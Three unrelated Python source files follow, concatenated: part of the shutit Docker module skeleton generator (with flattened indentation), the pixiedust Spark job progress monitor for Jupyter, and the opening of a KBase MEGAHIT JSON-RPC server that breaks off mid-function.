build += """\n\t\tshutit.send('export """ + '='.join(dockerfile_args) + """')"""
elif dockerfile_command == 'COMMENT':
build += """\n\t\t# """ + ' '.join(dockerfile_args)
while numpushes > 0:
build += """\n\t\tshutit.send('popd')"""
numpushes = numpushes - 1
templatemodule += '''
def build(self, shutit):''' + build + '''
return True
'''
# Gather and place finalize bit
finalize = ''
for line in shutit.cfg['dockerfile']['onbuild']:
finalize += '\n\t\tshutit.send(\'' + line + '\''
templatemodule += '''
def finalize(self, shutit):''' + finalize + '''
return True
def test(self, shutit):
return True
def is_installed(self, shutit):
return False
def get_config(self, shutit):
return True
'''
templatemodule += """
def module():
return template(
""" + """\'%s.%s.%s\'""" % (skel_domain, skel_module_name, skel_module_name) + """, """ + skel_domain_hash + ".00" + """,
description='',
maintainer='""" + shutit.cfg['dockerfile']['maintainer'] + """',
depends=['%s""" % (skel_depends) + """']
)
"""
# Return program to main shutit_dir
if dockerfile_dirname:
os.chdir(shutit_dir)
elif skel_example:
templatemodule = open(os.path.join(shutit_dir, 'assets', 'shutit_module_template.py')).read()
else:
templatemodule = open(os.path.join(shutit_dir, 'assets', 'shutit_module_template_bare.py')).read()
templatemodule = (templatemodule
).replace('template', skel_module_name
).replace('GLOBALLY_UNIQUE_STRING', '\'%s.%s.%s\'' % (skel_domain, skel_module_name, skel_module_name)
).replace('FLOAT', skel_domain_hash + '.00'
).replace('DEPENDS', skel_depends
)
readme = skel_module_name + ': description of module directory in here'
buildsh = textwrap.dedent('''\
#!/bin/bash
[[ -z "$SHUTIT" ]] && SHUTIT="$1/shutit"
[[ ! -a "$SHUTIT" ]] || [[ -z "$SHUTIT" ]] && SHUTIT="$(which shutit)"
if [[ ! -a "$SHUTIT" ]]
then
echo "Must have shutit on path, eg export PATH=$PATH:/path/to/shutit_dir"
exit 1
fi
pushd ..
$SHUTIT build --shutit_module_path $(dirname $SHUTIT)/library "$@"
if [[ $? != 0 ]]
then
popd
exit 1
fi
popd
''')
testsh = textwrap.dedent('''\
#!/bin/bash
# Test the building of this module
if [ $0 != test.sh ] && [ $0 != ./test.sh ]
then
echo
echo "Called as: $0"
echo "Must be run as test.sh or ./test.sh"
exit
fi
./build.sh "$@"
''')
volumes_arg = ''
for varg in shutit.cfg['dockerfile']['volume']:
volumes_arg += ' -v ' + varg + ':' + varg
ports_arg = ''
if type(shutit.cfg['dockerfile']['expose']) == str:
for parg in shutit.cfg['dockerfile']['expose']:
ports_arg += ' -p ' + parg + ':' + parg
else:
for parg in shutit.cfg['dockerfile']['expose']:
for port in parg.split():
ports_arg += ' -p ' + port + ':' + port
env_arg = ''
for earg in shutit.cfg['dockerfile']['env']:
env_arg += ' -e ' + earg.split()[0] + ':' + earg.split()[1]
runsh = textwrap.dedent('''\
#!/bin/bash
# Example for running
docker run -t -i''' + ports_arg + volumes_arg + env_arg + ' ' + skel_module_name + ' ' + shutit.cfg['dockerfile']['entrypoint'] + ' ' + shutit.cfg['dockerfile']['cmd'] + '\n')
buildpushsh = textwrap.dedent('''\
export SHUTIT_OPTIONS="$SHUTIT_OPTIONS --config configs/push.cnf -s repository push yes"
./build.sh "$@"
''')
buildcnf = textwrap.dedent('''\
###############################################################################
# PLEASE NOTE: This file should be changed only by the maintainer.
# PLEASE NOTE: This file is only sourced if the "shutit build" command is run
# and this file is in the relative path: configs/build.cnf
# This is to ensure it is only sourced if _this_ module is the
# target.
###############################################################################
# When this module is the one being built, which modules should be built along with it by default?
# This feeds into automated testing of each module.
[''' + '%s.%s.%s' % (skel_domain, skel_module_name, skel_module_name) + ''']
shutit.core.module.build:yes
# Allowed images as a regexp, eg ["ubuntu:12.*"], or [".*"], or ["centos"].
# It's recommended this is locked down as far as possible.
shutit.core.module.allowed_images:["''' + shutit.cfg['dockerfile']['base_image'] + '''"]
# Aspects of build process
[build]
base_image:''' + shutit.cfg['dockerfile']['base_image'] + '''
[repository]
name:''' + skel_module_name + '''
''')
pushcnf = textwrap.dedent('''\
###############################################################################
# PLEASE NOTE: This file should be changed only by the maintainer.
# PLEASE NOTE: IF YOU WANT TO CHANGE THE CONFIG, PASS IN
# --config configfilename
# OR ADD DETAILS TO YOUR
# ~/.shutit/config
# FILE
###############################################################################
[target]
rm:false
[repository]
# COPY THESE TO YOUR ~/.shutit/config FILE AND FILL OUT ITEMS IN CAPS
#user:YOUR_USERNAME
## Fill these out in server- and username-specific config (also in this directory)
#password:YOUR_REGISTRY_PASSWORD_OR_BLANK
## Fill these out in server- and username-specific config (also in this directory)
#email:YOUR_REGISTRY_EMAIL_OR_BLANK
#tag:no
#push:yes
#save:no
#export:no
##server:REMOVE_ME_FOR_DOCKER_INDEX
## tag suffix, defaults to "latest", eg registry/username/repository:latest.
## empty is also "latest"
#tag_name:latest
#suffix_date:no
#suffix_format:%s
''')
builddockerfile = textwrap.dedent('''\
FROM ''' + shutit.cfg['dockerfile']['base_image'] + '''
RUN apt-get update
RUN apt-get install -y -qq curl git python-pip
WORKDIR /opt
RUN git clone https://github.com/ianmiell/shutit.git
WORKDIR shutit
RUN pip install -r requirements.txt
WORKDIR ''' + skel_path + ''' <- TODO You will likely need to to change this
RUN /opt/shutit/shutit build --shutit_module_path /opt/shutit/library --delivery bash
CMD ["/bin/bash"]
''')
open(templatemodule_path, 'w').write(templatemodule)
open(readme_path, 'w').write(readme)
open(builddockerfile_path, 'w').write(builddockerfile)
open(buildsh_path, 'w').write(buildsh)
os.chmod(buildsh_path, os.stat(buildsh_path).st_mode | 0111) # chmod +x
open(testsh_path, 'w').write(testsh)
os.chmod(testsh_path, os.stat(testsh_path).st_mode | 0111) # chmod +x
open(runsh_path, 'w').write(runsh)
os.chmod(runsh_path, os.stat(runsh_path).st_mode | 0111) # chmod +x
open(buildpushsh_path, 'w').write(buildpushsh)
os.chmod(buildpushsh_path, os.stat(buildpushsh_path).st_mode | 0111) # chmod +x
# build.cnf should be read-only (maintainer changes only)
open(buildcnf_path, 'w').write(buildcnf)
os.chmod(buildcnf_path, 0400)
open(pushcnf_path, 'w').write(pushcnf)
os.chmod(pushcnf_path, 0600)
if skel_script is not None:
print textwrap.dedent('''\
================================================================================
Please note that your bash script in:
''' + skel_script + '''
should be a simple set of one-liners
that return to the prompt. Anything fancy with ifs, backslashes or other
multi-line commands need to be handled more carefully.
================================================================================''')
# egrep removes leading space
# grep removes comments
# sed1 ensures no confusion with double quotes
# sed2 replaces script lines with shutit code
# sed3 uses treble quotes for simpler escaping of strings
sbsi = '/tmp/shutit_bash_script_include_' + str(int(time.time()))
skel_mod_path = os.path.join(skel_path, skel_module_name + '.py')
# TODO: we probably don't need all these external programs any more
calls = [
#egrep -v '^[\s]*$' myscript.sh | grep -v '^#' | sed "s/"$/" /;s/^/ shutit.send("""/;s/$/""")/" > /tmp/shutit_bash_script_include_1400206744
r'''egrep -v '^[\s]*$' ''' + skel_script + r''' | grep -v '^#' | sed "s/\"$/\" /;s/^/\t\tshutit.send(\"\"\"/;s/$/\"\"\")/" > ''' + sbsi,
r'''sed "10r ''' + sbsi + '" ' + skel_mod_path + ' > ' + skel_mod_path + '.new''',
r'''mv ''' + skel_mod_path + '''.new ''' + skel_mod_path
]
for call in calls:
subprocess.check_call(['bash', '-c', call])
# Are we creating a new folder inside an existing git repo?
if subprocess.call(['git', 'status'], stdout=open(os.devnull, 'wb')) != 0:
subprocess.check_call(['git', 'init'], cwd=skel_path)
subprocess.check_call([
'cp', os.path.join(shutit_dir, '.gitignore'), '.gitignore'
], cwd=skel_path)
print textwrap.dedent('''\
================================================================================
Run:
cd ''' + skel_path + ' && ' + shutit_dir + '''/shutit build --interactive 3
and follow the tutorial, or:
cd ''' + skel_path + '''/bin && ./build.sh
to just go ahead and build it.
An image called ''' + skel_module_name + ''' will be created either way, and
can be run with the run.sh command.
================================================================================''')
# Parses the dockerfile (passed in as a string)
# and info to extract, and returns a list with the information in a more canonical form, still ordered.
def parse_dockerfile(shutit, contents):
    """Parse a Dockerfile (passed in as a string) into an ordered list of
    [command, arguments] pairs; comment lines come back as ['COMMENT', text].

    Backslash-terminated lines are folded into the following line before
    parsing. Lines matching neither a command nor a comment are logged via
    shutit.log and dropped.
    """
    parsed = []
    pending = ''
    for raw_line in contents.split('\n'):
        # Empty lines are skipped entirely (they do not flush a pending
        # continuation).
        if not raw_line:
            continue
        if raw_line.endswith('\\'):
            # Continuation: accumulate the line minus its backslash and
            # wait for the rest.
            pending += raw_line[:-1]
            continue
        pending += raw_line
        command_match = re.match("^[\s]*([A-Za-z]+)[\s]*(.*)$", pending)
        if command_match:
            parsed.append([command_match.group(1), command_match.group(2)])
        else:
            comment_match = re.match("^#(..*)$", pending)
            if comment_match:
                parsed.append(['COMMENT', comment_match.group(1)])
            else:
                shutit.log("Ignored line in parse_dockerfile: " + raw_line)
        pending = ''
    return parsed
def util_raw_input(shutit=None, prompt='', default=None):
    """Handles raw_input calls, and switches off interactivity if there is
    apparently no controlling terminal (or there are any other problems).

    shutit  - optional shutit object; when its build is already
              non-interactive, default is returned immediately
    prompt  - prompt string passed through to raw_input
    default - value returned when input cannot be read interactively
    """
    if shutit and shutit.cfg['build']['interactive'] == 0:
        return default
    if not determine_interactive(shutit):
        return default
    try:
        return raw_input(prompt)
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt still
        # propagate; any other failure (e.g. EOF, no controlling terminal)
        # means we should fall back to non-interactive mode.
        # (Also removed a dead `msg = ''` assignment at the top of the
        # original function.)
        msg = 'Problems getting raw input, assuming no controlling terminal.'
        if shutit:
            set_noninteractive(shutit, msg=msg)
        return default
def determine_interactive(shutit=None):
    """Determine whether we're in an interactive context.
    Sets interactivity off if appropriate.
    cf http://stackoverflow.com/questions/24861351/how-to-detect-if-python-script-is-being-run-as-a-background-process
    """
    try:
        # Not interactive when stdout is not a tty, or when this process is
        # not in the foreground process group of the controlling terminal.
        if not sys.stdout.isatty() or os.getpgrp() != os.tcgetpgrp(sys.stdout.fileno()):
            if shutit is not None:
                set_noninteractive(shutit)
            return False
    except Exception:
        # Narrowed from a bare except (which also swallowed KeyboardInterrupt
        # and SystemExit); e.g. stdout may lack fileno(), or tcgetpgrp can
        # fail when there is no controlling terminal. Also replaced
        # `shutit != None` with the idiomatic `is not None`.
        if shutit is not None:
            set_noninteractive(shutit, msg='Problems determining interactivity, assuming not.')
        return False
    return True
def set_noninteractive(shutit, msg="setting non-interactive"):
    """Disable interactivity for this build, recording why in the log."""
    shutit.log(msg)
    build_cfg = shutit.cfg['build']
    build_cfg['interactive'] = 0
    return None
def print_stack_trace():
    """Print the current exception's traceback framed by separator bars.

    Intended to be called from inside an except block; outside one,
    sys.exc_info() carries no traceback and only the bars/header print.
    """
    # Single-argument print(...) behaves identically as a Python 2
    # parenthesized print statement and a Python 3 function call, replacing
    # the py2-only `print 'x'` form. Also fixed the "Strack trace" typo in
    # the printed header.
    print('================================================================================')
    print('Stack trace was:\n================================================================================')
    import traceback
    (a, b, c) = sys.exc_info()
    traceback.print_tb(c)
    print('================================================================================')
# Flag shared with ctrl_c_signal_handler: True during the one-second window
# after a first CTRL-c, in which a second CTRL-c terminates the process.
in_ctrlc = False
def ctrlc_background():
    # Runs in a daemon thread: opens the one-second "press CTRL-c again to
    # quit" window by raising and then clearing the in_ctrlc flag.
    global in_ctrlc
    in_ctrlc = True
    time.sleep(1)
    in_ctrlc = False
def ctrl_c_signal_handler(signal, frame):
    """CTRL-c signal handler - enters a pause point if it can.
    """
    # Second CTRL-c within the window opened by ctrlc_background: hard-exit.
    if in_ctrlc:
        print "CTRL-c quit!"
        # Unfortunately we have 'except' blocks catching all exceptions,
        # so we can't use sys.exit
        os._exit(1)
    # NOTE(review): this branch is deliberately disabled ('if False and ...');
    # it would enter a shutit pause point when a shutit object is present in
    # the interrupted frame's locals — confirm whether it should be removed
    # or re-enabled.
    if False and 'shutit' in frame.f_locals:
        shutit = frame.f_locals['shutit']
        #print shutit
        shutit.pause_point(msg='Captured CTRL-c - entering pause point')
    else:
        # Open the double-CTRL-c window in a daemon thread so a second
        # CTRL-c within one second quits the process.
        t = threading.Thread(target=ctrlc_background)
        t.daemon = True
        t.start()
        print "CTRL-c caught, but not in context with ability to pause. CTRL-c twice to quit."
|
sparkJobProgressMonitor.py | # -------------------------------------------------------------------------------
# Copyright IBM Corp. 2017
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------------
from pixiedust.utils.template import PixiedustTemplateEnvironment
from IPython.core.getipython import *
from IPython.display import display, HTML, Javascript
from pixiedust.utils.shellAccess import ShellAccess
from pixiedust.utils.environment import Environment
from functools import reduce
import uuid
import json
import sys
import traceback
import pixiedust
from IPython.core.getipython import get_ipython
from collections import OrderedDict
from threading import Thread, Lock, Event
import time
# Module-level logger for this file.
myLogger = pixiedust.getLogger(__name__)
# Shared Jinja template environment used to render the monitor's JS/HTML.
_env = PixiedustTemplateEnvironment()
# Singleton SparkJobProgressMonitor, created lazily by
# enableSparkJobProgressMonitor(); loadingProgressMonitor guards against
# starting a second monitor while the background creation thread runs.
progressMonitor = None
loadingProgressMonitor = False
def enableSparkJobProgressMonitor():
    """Start the Spark job progress monitor in a background daemon thread.

    Prints a message and does nothing when running on DSX, or when a
    monitor is already enabled or currently being loaded.
    """
    if Environment.isRunningOnDSX:
        print("Spark Job Progress Monitoring cannot be started on DSX")
        return
    global progressMonitor, loadingProgressMonitor
    if progressMonitor is None and not loadingProgressMonitor:
        # Guard flag so concurrent calls don't start two monitors.
        # NOTE(review): the flag is never reset if the monitor fails to
        # start, so a failed start cannot be retried — confirm intended.
        loadingProgressMonitor = True
        def startSparkJobProgressMonitor():
            global progressMonitor
            progressMonitor = SparkJobProgressMonitor()
        t = Thread(target=startSparkJobProgressMonitor)
        t.daemon = True
        t.start()
        # Fixed typo in the user-facing message: "Succesfully" -> "Successfully".
        print("Successfully enabled Spark Job Progress Monitor")
    else:
        print("Spark Job Progress Monitor already enabled")
class SparkJobProgressMonitorOutput(Thread):
    """Daemon thread that collects Spark listener events (delivered through
    printStuff by the Py4J callback) and periodically renders them as
    Javascript progress updates into the notebook cell."""

    class Java:
        # Py4J callback interface implemented by this class.
        implements = ["com.ibm.pixiedust.PixiedustOutputListener"]

    def __init__(self):
        super(SparkJobProgressMonitorOutput,self).__init__()
        # Short id of the notebook cell currently being monitored.
        self.prefix = None
        # Protects progressData, which is written by the callback thread
        # (printStuff) and drained by run().
        self.lock = Lock()
        # Signalled whenever new progress data arrives.
        self.triggerEvent = Event()
        self.daemon = True
        # Latest event per key, in arrival order (key -> event dict).
        self.progressData = OrderedDict()

    def getUpdaterId(self):
        return "updaterId{0}".format(self.prefix)

    def getProgressHTMLId(self):
        return "progress{0}".format(self.prefix)

    def run(self):
        # Render loop: block until printStuff signals new data, atomically
        # swap the accumulated events out from under the lock, then render
        # them outside the lock as one Javascript batch.
        while True:
            self.triggerEvent.wait()
            with self.lock:
                self.triggerEvent.clear()
                if bool(self.progressData):
                    progressData = self.progressData
                    self.progressData = OrderedDict()
                else:
                    progressData = OrderedDict()
            if bool(progressData):
                js = ""
                for data in progressData.values():
                    channel = data["channel"]
                    if channel=="jobStart":
                        js += _env.getTemplate("sparkJobProgressMonitor/addJobTab.js").render(
                            prefix=self.prefix, data=data, overalNumTasks=reduce(lambda x,y:x+y["numTasks"], data["stageInfos"], 0)
                        )
                    elif channel=="stageSubmitted":
                        js += _env.getTemplate("sparkJobProgressMonitor/updateStageStatus.js").render(
                            prefix=self.prefix, stageId=data["stageInfo"]["stageId"], status="Submitted", host=None
                        )
                    elif channel=="taskStart":
                        js += _env.getTemplate("sparkJobProgressMonitor/taskStart.js").render( prefix=self.prefix, data=data, increment = data["increment"] )
                        js += "\n"
                        js += _env.getTemplate("sparkJobProgressMonitor/updateStageStatus.js").render(
                            prefix=self.prefix, stageId=data["stageId"], status="Running",
                            host="{0}({1})".format(data["taskInfo"]["executorId"],data["taskInfo"]["host"] )
                        )
                    elif channel=="stageCompleted":
                        js += _env.getTemplate("sparkJobProgressMonitor/updateStageStatus.js").render(
                            prefix=self.prefix, stageId=data["stageInfo"]["stageId"], status="Completed", host=None
                        )
                    elif channel=="jobEnd":
                        js += _env.getTemplate("sparkJobProgressMonitor/jobEnded.js").render(
                            prefix=self.prefix, jobId=data["jobId"]
                        )
                    # Separate each event's snippet with a newline.
                    js += "\n"
                display(Javascript(js))
            # Throttle: at most one render every half second.
            time.sleep(0.5)

    def display_with_id(self, obj, display_id, update=False):
        """Create a new display with an id"""
        ip = get_ipython()
        # Only a real kernel can address a display by id; otherwise fall
        # back to a plain display().
        if hasattr(ip, "kernel"):
            data, md = ip.display_formatter.format(obj)
            content = {
                'data': data,
                'metadata': md,
                'transient': {'display_id': display_id},
            }
            msg_type = 'update_display_data' if update else 'display_data'
            ip.kernel.session.send(ip.kernel.iopub_socket, msg_type, content, parent=ip.parent_header)
        else:
            display(obj)

    def printOutput(self, s):
        # Part of the PixiedustOutputListener interface: plain text output.
        print(s)

    def sendChannel(self, channel, data):
        # Part of the PixiedustOutputListener interface: structured events.
        self.printStuff(channel, data)

    def onRunCell(self):
        # pre_run_cell hook: give the new cell its own monitor area.
        self.prefix = str(uuid.uuid4())[:8]
        #Create the place holder area for the progress monitor
        self.display_with_id(
            HTML( _env.getTemplate("sparkJobProgressMonitor/pmLayout.html").render( prefix = self.prefix)),self.getProgressHTMLId()
        )

    def printStuff(self,channel, s):
        # Called from the listener with a JSON payload; dedupe events by a
        # per-channel key, count repeats via "increment", and wake run().
        try:
            data = json.loads(s)
            data["channel"] = channel
            data["increment"] = 1
            key = None
            if channel=="jobStart":
                key = "{0}-{1}".format(channel,data["jobId"])
            elif channel=="stageSubmitted":
                key = "{0}-{1}".format(channel,data["stageInfo"]["stageId"])
            elif channel=="taskStart":
                key = "{0}-{1}".format(channel,data["stageId"])
            elif channel=="stageCompleted":
                key = "{0}-{1}".format(channel,data["stageInfo"]["stageId"])
            elif channel=="jobEnd":
                key = "{0}-{1}".format(channel,data["jobId"])
            if key:
                with self.lock:
                    if key in self.progressData:
                        data["increment"] = self.progressData[key]["increment"] + 1
                    self.progressData[key] = data
                    self.triggerEvent.set()
        except:
            print("Unexpected error: {0} - {1} : {2}".format(channel, s, sys.exc_info()[0]))
            traceback.print_exc()
class SparkJobProgressMonitor(object):
    """Registers a Spark listener (via the scala cell magic) and bridges its
    events to a SparkJobProgressMonitorOutput rendering thread."""

    def __init__(self):
        self.monitorOutput = None
        self.addSparkListener()
        # Maps a pixiedust display contextId to the cell prefix it renders in.
        self.displayRuns={}
        self.newDisplayRun = False

    def onDisplayRun(self, contextId):
        # Called at the start of a pixiedust display() run; re-targets
        # progress output at the cell previously associated with contextId,
        # or records the association on the first run.
        if contextId is None or self.monitorOutput is None:
            self.newDisplayRun=True
            return
        cellContext = self.displayRuns.get( contextId )
        if cellContext and cellContext != self.monitorOutput.prefix:
            #switch the cell context if not a new display Run
            if self.newDisplayRun:
                self.displayRuns.pop( contextId, None )
            else:
                self.monitorOutput.prefix = cellContext
        elif cellContext is None:
            self.displayRuns[contextId] = self.monitorOutput.prefix
        if cellContext:
            # Clear any stale job tabs left in the re-used cell.
            display(Javascript(_env.getTemplate("sparkJobProgressMonitor/emptyTabs.js").render(prefix=cellContext)))
        self.newDisplayRun=False

    def addSparkListener(self):
        # Compiles and registers the scala SparkListener in the kernel, then
        # wires its output channel to a new SparkJobProgressMonitorOutput
        # thread and hooks cell execution to create the monitor area.
        try:
            get_ipython().run_cell_magic(
                "scala",
                "cl=sparkProgressMonitor noSqlContext",
                _env.getTemplate("sparkJobProgressMonitor/addSparkListener.scala").render()
            )
            listener = get_ipython().user_ns.get("__pixiedustSparkListener")
            #access the listener object from the namespace
            if listener:
                self.monitorOutput = SparkJobProgressMonitorOutput()
                self.monitorOutput.start()
                #Add pre_run_cell event handler
                get_ipython().events.register('pre_run_cell',lambda: self.monitorOutput.onRunCell() )
                listener.setChannelListener( self.monitorOutput )
        except:
            myLogger.exception("Unexpected error while adding Spark Listener")
            raise
|
MEGAHITServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from MEGAHIT.authclient import KBaseAuth as _KBaseAuth
# Environment variable names: where the deployment config file lives, which
# service section to read, and the auth-service URL key within it.
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'

# Note that the error fields do not match the 2.0 JSONRPC spec


def get_config_file():
    """Return the path of the deployment config file, or None if unset."""
    return environ.get(DEPLOY)


def get_service_name():
    """Return the configured service name, or None if unset."""
    return environ.get(SERVICE)
def get_config():
    """Load this service's section of the deployment config as a dict.

    Returns None when no deployment config file is configured in the
    environment.
    """
    if not get_config_file():
        return None
    parser = ConfigParser()
    parser.read(get_config_file())
    section = get_service_name() or 'MEGAHIT'
    return {name: value for name, value in parser.items(section)}
# Service configuration read once at import time (None when running outside
# a deployment, i.e. KB_DEPLOYMENT_CONFIG is unset).
config = get_config()

# Import deferred until config is available, since the implementation
# singleton is constructed immediately below with that config.
from MEGAHIT.MEGAHITImpl import MEGAHIT  # noqa @IgnorePep8
impl_MEGAHIT = MEGAHIT(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that additionally serializes sets, frozensets and any
    object exposing a toJSONable() hook."""

    def default(self, obj):
        # Sets are not natively JSON-serializable; emit them as lists.
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        # Objects may opt in to serialization via a toJSONable() method.
        to_jsonable = getattr(obj, 'toJSONable', None)
        if to_jsonable is not None:
            return to_jsonable()
        # Defer to the base class, which raises TypeError.
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSONRPCService subclass that threads a per-request context object
    through every method call and serializes results with
    JSONObjectEncoder."""

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)

        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                # (the implicit ctx argument accounts for the -1)
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')

                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError

                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # NOTE(review): e.message and basestring are Python-2-only;
            # under Python 3 this handler would itself raise.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if isinstance(e.message, basestring):
                newerr.data = e.message
            else:
                # Some exceptions embed other exceptions as the message
                newerr.data = repr(e.message)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #    rdata = json.loads(jsondata)
        # except ValueError:
        #    raise ParseError
        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)

            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)

            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)

            if responds:
                return responds

            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # NOTE(review): dict.has_key is Python-2-only.
        if self.method_data[request['method']].has_key('types'):  # noqa @IgnorePep8
            self._validate_params_types(request['method'], request['params'])

        result = self._call_method(ctx, request)

        # Do not respond to notifications.
        if request['id'] is None:
            return None

        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']

        return respond
class MethodContext(dict):
    """Per-request call context (client ip, auth info, provenance, ...)
    passed as the first argument to every service method; also proxies
    logging through the supplied logger."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Log levels (numeric or symbolic) that are passed through to the
        # logger unchanged by log_debug().
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        self._log(log.ERR, message)

    def log_info(self, message):
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        if level in self._debug_levels:
            pass
        else:
            # Map user debug levels 1..3 onto logger levels 7..9.
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        # When running under a callback server (SDK_CALLBACK_URL set), fetch
        # the full provenance from it; otherwise return the locally stored
        # provenance list.
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                # The callback server packs errors as JSON when it can.
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = '' if not message else message
        # data = JSON RPC 2.0, error = 1.1
        self.data = data or error or ''

    def __str__(self):
        return '{0}: {1}. {2}\n{3}'.format(
            self.name, str(self.code), self.message, self.data)
def getIPAddress(environ):
    """Best-effort client IP: prefer X-Forwarded-For, then X-Real-IP, then
    the socket peer address — unless config says not to trust the headers."""
    if config is not None and config.get('dont_trust_x_ip_headers') == 'true':
        # Proxy headers explicitly distrusted: use the peer address only.
        return environ.get('REMOTE_ADDR')
    forwarded = environ.get('HTTP_X_FORWARDED_FOR')
    if forwarded:
        # The first hop in the X-Forwarded-For chain is the original client.
        return forwarded.split(',')[0].strip()
    real_ip = environ.get('HTTP_X_REAL_IP')
    if real_ip:
        return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MEGAHIT'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MEGAHIT.run_megahit,
name='MEGAHIT.run_megahit',
types=[dict])
self.method_authentication['MEGAHIT.run_megahit'] = 'required' # noqa
self.rpc_service.add(impl_MEGAHIT.status,
name='MEGAHIT.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
